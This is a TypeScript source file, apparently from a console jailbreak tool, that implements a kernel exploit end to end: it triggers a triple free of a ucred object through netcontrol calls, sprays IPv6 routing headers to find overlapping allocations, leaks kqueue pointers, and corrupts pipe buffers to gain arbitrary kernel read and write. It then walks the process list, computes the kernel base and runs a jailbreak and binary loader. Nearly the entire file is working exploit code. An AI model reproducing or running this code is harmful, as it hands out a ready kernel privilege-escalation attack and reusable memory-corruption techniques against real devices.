function find_triplet (master: number, other: number, iterations?: number) {
  // debug("Enter find_triplet (" + master + ") (" + other + ")" );

  if (typeof iterations === 'undefined') {
    iterations = MAX_ROUNDS_TRIPLET
  }

  let count = 0
  let val
  let i
  let j

  // Minimizing the usage of BigInt class
  const spray_add = spray_rthdr.add(0x04)
  const leak_add = leak_rthdr.add(0x04)

  while (count < iterations) {
    if (count % 100 === 0) {
      // debug("find_triplet iteration: " + count);
    }
    for (i = 0; i < ipv6_socks.length; i++) {
      if (i === master || i === other) {
        continue
      }

      write32(spray_add, RTHDR_TAG | i)
      set_rthdr(ipv6_socks[i], spray_rthdr, spray_rthdr_len)

      // Using pre-filled buffer to spray
      // set_rthdr(ipv6_socks[i], spray_rthdr_rop.add(i*UCRED_SIZE), spray_rthdr_len);
      // setsockopt(ipv6_socks[i], IPPROTO_IPV6, IPV6_RTHDR, spray_rthdr_rop.add(i*UCRED_SIZE), spray_rthdr_len);
    }

    // for (i = 0; i < ipv6_socks.length; i++) {
    //    if (i === master || i === other) {
    //        continue;
    //    }
    get_rthdr(ipv6_socks[master], leak_rthdr, 8)
    val = read32(leak_add)
    j = val & 0xFFFF
    if ((val & 0xFFFF0000) === RTHDR_TAG && j !== master && j !== other) {
      // debug("Triplet found: [" + j + "] at iteration " + count);
      return j
    }
    // }
    count++
  }
  return -1
  // cleanup();
  // throw new Error("find_triplet failed");
}

function init_threading () {
  const jmpbuf = malloc(0x60)
  setjmp(jmpbuf)
  saved_fpu_ctrl = Number(read32(jmpbuf.add(0x40)))
  saved_mxcsr = Number(read32(jmpbuf.add(0x44)))
}

const LOG_MAX_LINES = 38
const LOG_COLORS = [
  '#FF6B6B', '#FFA94D', '#FFD93D', '#6BCF7F',
  '#4DABF7', '#9775FA', '#DA77F2'
]

function setup_log_screen () {
  jsmaf.root.children.length = 0

  const bg = new Image({
    url: 'file:///../download0/img/multiview_bg_VAF.png',
    x: 0,
    y: 0,
    width: 1920,
    height: 1080
  })
  jsmaf.root.children.push(bg)

  for (let i = 0; i < LOG_COLORS.length; i++) {
    new Style({ name: 'log' + i, color: LOG_COLORS[i], size: 20 })
  }

  const logLines: jsmaf.Text[] = []
  const logBuf: string[] = []

  for (let i = 0; i < LOG_MAX_LINES; i++) {
    const line = new jsmaf.Text()
    line.text = ''
    line.style = 'log' + (i % LOG_COLORS.length)
    line.x = 20
    line.y = 120 + i * 20
    jsmaf.root.children.push(line)
    logLines.push(line)
  }

  _log = function (msg: string, screen: boolean) {
    if (screen) {
      logBuf.push(msg)
      if (logBuf.length > LOG_MAX_LINES) logBuf.shift()
      for (let i = 0; i < LOG_MAX_LINES; i++) {
        logLines[i].text = i < logBuf.length ? logBuf[i] : ''
      }
    }
    ws.broadcast(msg)
  }
}

function yield_to_render (callback: () => void) {
  const id = jsmaf.setInterval(function () {
    jsmaf.clearInterval(id)
    try {
      callback()
    } catch (e) {
      log('ERROR: ' + (e as Error).message)
      cleanup()
    }
  }, 0)
}

let exploit_count = 0
let exploit_end = false

function netctrl_exploit () {
  setup_log_screen()

  const supported_fw = init()
  if (!supported_fw) {
    return
  }

  log('Setting up exploit...')
  yield_to_render(exploit_phase_setup)
}

function exploit_phase_setup () {
  setup()
  log('Workers spawned')
  exploit_count = 0
  exploit_end = false
  yield_to_render(exploit_phase_trigger)
}

function exploit_phase_trigger () {
  if (exploit_count >= MAIN_LOOP_ITERATIONS) {
    log('Failed to acquire kernel R/W')
    cleanup()
    return
  }

  exploit_count++
  log('Triggering vulnerability (' + exploit_count + '/' + MAIN_LOOP_ITERATIONS + ')...')

  if (!trigger_ucred_triplefree()) {
    yield_to_render(exploit_phase_trigger)
    return
  }

  log('Leaking kqueue...')
  yield_to_render(exploit_phase_leak)
}

function exploit_phase_leak () {
  if (!leak_kqueue_safe()) {
    log('[leak_kqueue_safe] failed, retrying...')
    yield_to_render(exploit_phase_trigger)
    return
  }

  log('Setting up arbitrary R/W...')
  yield_to_render(exploit_phase_rw)
}

function exploit_phase_rw () {
  setup_arbitrary_rw()
  log('Jailbreaking...')
  yield_to_render(exploit_phase_jailbreak)
}

function exploit_phase_jailbreak () {
  jailbreak()
}

function setup_arbitrary_rw () {
  // Leak fd_files from kq_fdp.
  const fd_files = kreadslow64_safe(kq_fdp)
  fdt_ofiles = fd_files.add(0x00)
  debug('fdt_ofiles: ' + hex(fdt_ofiles))

  master_r_pipe_file = kreadslow64_safe(fdt_ofiles.add(master_pipe[0] * FILEDESCENT_SIZE))
  debug('master_r_pipe_file: ' + hex(master_r_pipe_file))

  victim_r_pipe_file = kreadslow64_safe(fdt_ofiles.add(victim_pipe[0] * FILEDESCENT_SIZE))
  debug('victim_r_pipe_file: ' + hex(victim_r_pipe_file))

  master_r_pipe_data = kreadslow64_safe(master_r_pipe_file.add(0x00))
  debug('master_r_pipe_data: ' + hex(master_r_pipe_data))

  victim_r_pipe_data = kreadslow64_safe(victim_r_pipe_file.add(0x00))
  debug('victim_r_pipe_data: ' + hex(victim_r_pipe_data))

  // Corrupt pipebuf of masterRpipeFd.
  write32(master_pipe_buf.add(0x00), 0)                // cnt
  write32(master_pipe_buf.add(0x04), 0)                // in
  write32(master_pipe_buf.add(0x08), 0)                // out
  write32(master_pipe_buf.add(0x0C), PAGE_SIZE)        // size
  write64(master_pipe_buf.add(0x10), victim_r_pipe_data)  // buffer

  const ret_write = kwriteslow(master_r_pipe_data, master_pipe_buf, PIPEBUF_SIZE)

  if (ret_write.eq(BigInt_Error)) {
    cleanup()
    throw new Error('Netctrl failed - Reboot and try again')
  }

  // Increase reference counts for the pipes.
  fhold(fget(master_pipe[0]))
  fhold(fget(master_pipe[1]))
  fhold(fget(victim_pipe[0]))
  fhold(fget(victim_pipe[1]))

  // Remove rthdr pointers from triplets
  remove_rthr_from_socket(ipv6_socks[triplets[0]])
  remove_rthr_from_socket(ipv6_socks[triplets[1]])
  remove_rthr_from_socket(ipv6_socks[triplets[2]])

  // Remove triple freed file from free list
  remove_uaf_file()

  for (let i = 0; i < 0x20; i = i + 8) {
    const readed = kread64(master_r_pipe_data.add(i))
    debug('Reading master_r_pipe_data[' + i + '] : ' + hex(readed))
  }

  log('Arbitrary R/W achieved')

  debug('Reading value in victim_r_pipe_file: ' + hex(kread64(victim_r_pipe_file)))
}

function find_allproc () {
  // Use existing master_pipe instead of creating new one
  const pipe_0 = master_pipe[0]
  const pipe_1 = master_pipe[1]
  debug('find_allproc - Using master_pipe fds: ' + pipe_0 + ', ' + pipe_1)

  debug('find_allproc - Getting pid...')
  const pid = Number(getpid())
  debug('find_allproc - pid: ' + pid)

  debug('find_allproc - Writing pid to sockopt_val_buf...')
  write32(sockopt_val_buf, pid)
  debug('find_allproc - Calling ioctl FIOSETOWN...')
  const ioctl_ret = ioctl(new BigInt(pipe_0), FIOSETOWN, sockopt_val_buf)
  debug('find_allproc - ioctl returned: ' + ioctl_ret)

  debug('find_allproc - Getting fp...')
  const fp = fget(pipe_0)
  debug('find_allproc - fp: ' + hex(fp))

  debug('find_allproc - Reading f_data...')
  const f_data = kread64(fp.add(0x00))
  debug('find_allproc - f_data: ' + hex(f_data))

  debug('find_allproc - Reading pipe_sigio...')
  const pipe_sigio = kread64(f_data.add(0xd0))
  debug('find_allproc - pipe_sigio: ' + hex(pipe_sigio))

  debug('find_allproc - Reading p...')
  let p = kread64(pipe_sigio)
  debug('find_allproc - initial p: ' + hex(p))
  kernel.addr.curproc = p // Set global curproc

  debug('find_allproc - Walking process list...')
  let walk_count = 0
  while (!(p.and(new BigInt(0xFFFFFFFF, 0x00000000))).eq(new BigInt(0xFFFFFFFF, 0x00000000))) {
    p = kread64(p.add(0x08)) // p_list.le_prev
    walk_count++
    if (walk_count % 100 === 0) {
      debug('find_allproc - walk_count: ' + walk_count + ' p: ' + hex(p))
    }
  }
  debug('find_allproc - Found allproc after ' + walk_count + ' iterations')

  // Don't close - using master_pipe which we need

  return p
}

function jailbreak () {
  debug('jailbreak - Starting...')
  if (!kernel_offset) {
    throw new Error('Kernel offsets not loaded')
  }
  if (FW_VERSION === null) {
    throw new Error('FW_VERSION is null')
  }
  // Stabilize
  for (let i = 0; i < 10; i++) {
    sched_yield()
  }
  debug('jailbreak - Calling find_allproc...')
  kernel.addr.allproc = find_allproc() // Set global allproc
  debug('allproc: ' + hex(kernel.addr.allproc))

  // Calculate kernel base
  kernel.addr.base = kl_lock.sub((kernel_offset as { KL_LOCK: number }).KL_LOCK)
  log('Kernel base: ' + hex(kernel.addr.base))

  jailbreak_shared(FW_VERSION)

  log('Jailbreak Complete - JAILBROKEN')
  utils.notify('The Vue-after-Free team congratulates you\nNetCtrl Finished OK\nEnjoy freedom')

  cleanup(false) // Close sockets and kill workers on success
  show_success()
  run_binloader()
}

function fhold (fp: BigInt) {
  kwrite32(fp.add(0x28), kread32(fp.add(0x28)) + 1) // f_count
}

function fget (fd: number) {
  return kread64(fdt_ofiles.add(fd * FILEDESCENT_SIZE))
}

function remove_rthr_from_socket (fd: number) {
  // In case last triplet was not found in kwriteslow
  // At this point we don't care about twins/triplets
  if (fd > 0) {
    const fp = fget(fd)
    const f_data = kread64(fp.add(0x00))
    const so_pcb = kread64(f_data.add(0x18))
    const in6p_outputopts = kread64(so_pcb.add(0x118))
    kwrite64(in6p_outputopts.add(0x68), new BigInt(0)) // ip6po_rhi_rthdr
  }
}

const victim_pipe_buf = malloc(PIPEBUF_SIZE)

function corrupt_pipe_buf (cnt: number, _in: number, out: number, size: number, buffer: BigInt) {
  if (buffer.eq(0)) {
    throw new Error('buffer cannot be zero')
  }
  write32(victim_pipe_buf.add(0x00), cnt)      // cnt
  write32(victim_pipe_buf.add(0x04), _in)       // in
  write32(victim_pipe_buf.add(0x08), out)      // out
  write32(victim_pipe_buf.add(0x0C), size)     // size
  write64(victim_pipe_buf.add(0x10), buffer)   // buffer
  write(new BigInt(masterWpipeFd), victim_pipe_buf, PIPEBUF_SIZE)

  // Debug
  /*
    read(masterRpipeFd, debug_buffer, PIPEBUF_SIZE);
    for (const i=0; i<PIPEBUF_SIZE; i=i+8) {
        const readed = read64(victim_pipe_buf.add(i));
        debug("corrupt_read: " + hex(readed) );
    }
        */

  return read(new BigInt(masterRpipeFd), victim_pipe_buf, PIPEBUF_SIZE)
}

function kwrite (dest: BigInt, src: BigInt, n: number) {
  corrupt_pipe_buf(0, 0, 0, PAGE_SIZE, dest)
  return write(new BigInt(victimWpipeFd), src, n)
}

function kread (dest: BigInt, src: BigInt, n: number) {
  debug('Enter kread for src: ' + hex(src))
  corrupt_pipe_buf(n, 0, 0, PAGE_SIZE, src)
  // Debug
  read(new BigInt(victimRpipeFd), dest, n)
  // for (const i=0; i<n; i=i+8) {
  //    const readed = read64(dest.add(i));
  // debug("kread_read: " + hex(readed) );
  // }
}

function kwrite64 (addr: BigInt, val: BigInt) {
  write64(tmp, val)
  kwrite(addr, tmp, 8)
}

function kwrite32 (addr: BigInt, val: number) {
  write32(tmp, val)
  kwrite(addr, tmp, 4)
}

function kread64 (addr: BigInt) {
  kread(tmp, addr, 8)
  return read64(tmp)
}

function kread32 (addr: BigInt) {
  kread(tmp, addr, 4)
  return read32(tmp)
}

function read_buffer (addr: BigInt, len: number) {
  const buffer = new Uint8Array(len)
  for (let i = 0; i < len; i++) {
    buffer[i] = Number(read8(addr.add(i)))
  }
  return buffer
}

function write_buffer (addr: BigInt, buffer: Uint8Array) {
  for (let i = 0; i < buffer.length; i++) {
    write8(addr.add(i), buffer[i]!)
  }
}

// Functions used in global kernel.js
// buf is Uint8Array()
kernel.read_buffer = function (kaddr, len) {
  kread(tmp, kaddr, len)
  return read_buffer(tmp, len)
}

kernel.write_buffer = function (kaddr, buf) {
  write_buffer(tmp, buf)
  kwrite(kaddr, tmp, buf.length)
}

function remove_uaf_file () {
  if (uaf_socket === undefined) {
    throw new Error('uaf_socket is undefined')
  }
  const uafFile = fget(uaf_socket)
  kwrite64(fdt_ofiles.add(uaf_socket * FILEDESCENT_SIZE), new BigInt(0))
  let removed = 0
  for (let i = 0; i < 0x1000; i++) {
    const s = Number(socket(AF_UNIX, SOCK_STREAM, 0))
    if (fget(s).eq(uafFile)) {
      kwrite64(fdt_ofiles.add(s * FILEDESCENT_SIZE), new BigInt(0))
      removed++
    }
    close(new BigInt(s))
    if (removed === 3) {
      break
    }
  }
}

function trigger_ucred_triplefree () {
  let end = false

  write64(msgIov.add(0x0), 1) // iov_base
  write64(msgIov.add(0x8), 1) // iov_len

  let main_count = 0 // Let's do up to 8 iterations

  while (!end && main_count < TRIPLEFREE_ITERATIONS) {
    main_count++

    // debug('    Memory: avail=' + debugging.info.memory.available + ' dmem=' + debugging.info.memory.available_dmem + ' libc=' + debugging.info.memory.available_libc);
    const dummy_socket = socket(AF_UNIX, SOCK_STREAM, 0)

    // Register dummy socket.
    write32(nc_set_buf, Number(dummy_socket.and(0xFFFFFFFF)))
    netcontrol(BigInt_Error, NET_CONTROL_NETEVENT_SET_QUEUE, nc_set_buf, 8)

    // Close the dummy socket.
    close(new BigInt(dummy_socket))

    // Allocate a new ucred.
    setuid(1)

    // Reclaim the file descriptor.
    uaf_socket = Number(socket(AF_UNIX, SOCK_STREAM, 0))

    // Free the previous ucred. Now uafSock's cr_refcnt of f_cred is 1.
    setuid(1)

    // Unregister dummy socket and free the file and ucred.
    write32(nc_clear_buf, uaf_socket)
    netcontrol(BigInt_Error, NET_CONTROL_NETEVENT_CLEAR_QUEUE, nc_clear_buf, 8)

    // Set cr_refcnt back to 1.
    for (let i = 0; i < 32; i++) {
      // Reclaim with iov.
      trigger_iov_recvmsg()
      sched_yield()
      // Release buffers.
      write(new BigInt(iov_sock_1), tmp, 1)
      wait_iov_recvmsg()
      read(new BigInt(iov_sock_0), tmp, 1)
    }

    // Double free ucred.
    // Note: Only dup works because it does not check f_hold.
    close(dup(new BigInt(uaf_socket)))

    // debug("Finding Twins...");
    // Find twins.
    end = find_twins()

    if (!end) {
      if (cleanup_called) {
        throw new Error('Netctrl failed - Reboot and try again')
      }
      // Clean up and start again
      close(new BigInt(uaf_socket))
      continue
    }

    log('Triple freeing...')

    // Free one.
    free_rthdr(ipv6_socks[twins[1]])

    let count = 0

    // Set cr_refcnt back to 1.
    while (count < 10000) {
      // Reclaim with iov.
      trigger_iov_recvmsg()
      sched_yield()

      get_rthdr(ipv6_socks[twins[0]], leak_rthdr, 8)

      if (read32(leak_rthdr) === 1) {
        break
      }

      // Release iov spray.
      write(new BigInt(iov_sock_1), tmp, 1)
      wait_iov_recvmsg()
      read(new BigInt(iov_sock_0), tmp, 1)
      count++
    }

    if (count === 1000) {
      log('Dropped out from reclaim loop')
      // Clean up and start again
      close(new BigInt(uaf_socket))
      continue
    }

    triplets[0] = twins[0]

    // Triple free ucred.
    close(dup(new BigInt(uaf_socket)))

    // Find triplet.
    triplets[1] = find_triplet(triplets[0], -1)

    // If error start again to better exploit possibility
    if (triplets[1] === -1) {
      log("Couldn't find triplet 1")
      // Clean up and start again
      // Release iov spray.
      // if we break on 'read32(leak_rthdr) == 1', we never released workers
      write(new BigInt(iov_sock_1), tmp, 1)
      close(new BigInt(uaf_socket))
      // Start again
      end = false
      continue
    }

    // Release iov spray.
    // if we break on 'read32(leak_rthdr) == 1', we never released workers
    write(new BigInt(iov_sock_1), tmp, 1)

    // Find triplet.
    triplets[2] = find_triplet(triplets[0], triplets[1])

    // If error start again to better exploit possibility
    if (triplets[2] === -1) {
      log("Couldn't find triplet 2")
      // Clean up and start again
      close(new BigInt(uaf_socket))
      // Start again
      end = false
      continue
    }

    // Wait iov release completition
    wait_iov_recvmsg()
    read(new BigInt(iov_sock_0), tmp, 1)
  }

  if (main_count === TRIPLEFREE_ITERATIONS) {
    log('Failed to Triple Free')
    return false
  }
  return true
}

function leak_kqueue () {
  debug('Leaking kqueue...')

  free_rthdr(ipv6_socks[triplets[1]])

  let kq = new BigInt(0)

  const magic_val = new BigInt(0x0, 0x1430000)
  const magic_add = leak_rthdr.add(0x08)

  let count = 0
  const MAX_KQ = 5000   // الحد الآمن الجديد

  while (count < MAX_KQ) {
    count++

    kq = kqueue()

    get_rthdr(ipv6_socks[triplets[0]], leak_rthdr, 0x100)

    if (read64(magic_add).eq(magic_val) && !read64(leak_rthdr.add(0x98)).eq(0)) {
      break
    }

    close(kq)
    sched_yield()
  }

  if (count >= MAX_KQ) {
    log('leak_kqueue: exceeded MAX_KQ iterations')
    return false
  }

  kl_lock = read64(leak_rthdr.add(0x60))
  kq_fdp = read64(leak_rthdr.add(0x98))

  if (kq_fdp.eq(0)) {
    log('Failed to leak kqueue_fdp')
    return false
  }

  debug('kq_fdp: ' + hex(kq_fdp) + ' kl_lock: ' + hex(kl_lock))

  close(kq)

  triplets[1] = find_triplet(triplets[0], triplets[2])

  return true
}


function leak_kqueue_safe() {
  try {
    return leak_kqueue()
  } catch (e) {
    log('leak_kqueue_safe ERROR: ' + (e as Error).message)
    return false
  }
}

function kreadslow64 (address: BigInt) {
  const buffer = kreadslow(address, 8)
  // debug("Buffer from kreadslow: " + hex(buffer));
  if (buffer.eq(BigInt_Error)) {
    cleanup()
    throw new Error('Netctrl failed - Reboot and try again')
  }
  return read64(buffer)
}

function kreadslow64_safe (address: BigInt): BigInt {
  const buffer = kreadslow(address, 8)

  if (buffer.eq(BigInt_Error)) {
    log('kreadslow64_safe: kreadslow returned BigInt_Error at addr ' + hex(address))
    cleanup()
    throw new Error('Netctrl failed - Reboot and try again')
  }

  return read64(buffer)
}

function build_uio (uio: BigInt, uio_iov: BigInt, uio_td: number, read: boolean, addr: BigInt, size: number) {
  write64(uio.add(0x00), uio_iov)        // uio_iov
  write64(uio.add(0x08), UIO_IOV_NUM)    // uio_iovcnt
  write64(uio.add(0x10), BigInt_Error)   // uio_offset
  write64(uio.add(0x18), size)           // uio_resid
  write32(uio.add(0x20), UIO_SYSSPACE)   // uio_segflg
  write32(uio.add(0x24), read ? UIO_WRITE : UIO_READ) // uio_segflg
  write64(uio.add(0x28), uio_td)         // uio_td
  write64(uio.add(0x30), addr)           // iov_base
  write64(uio.add(0x38), size)           // iov_len
}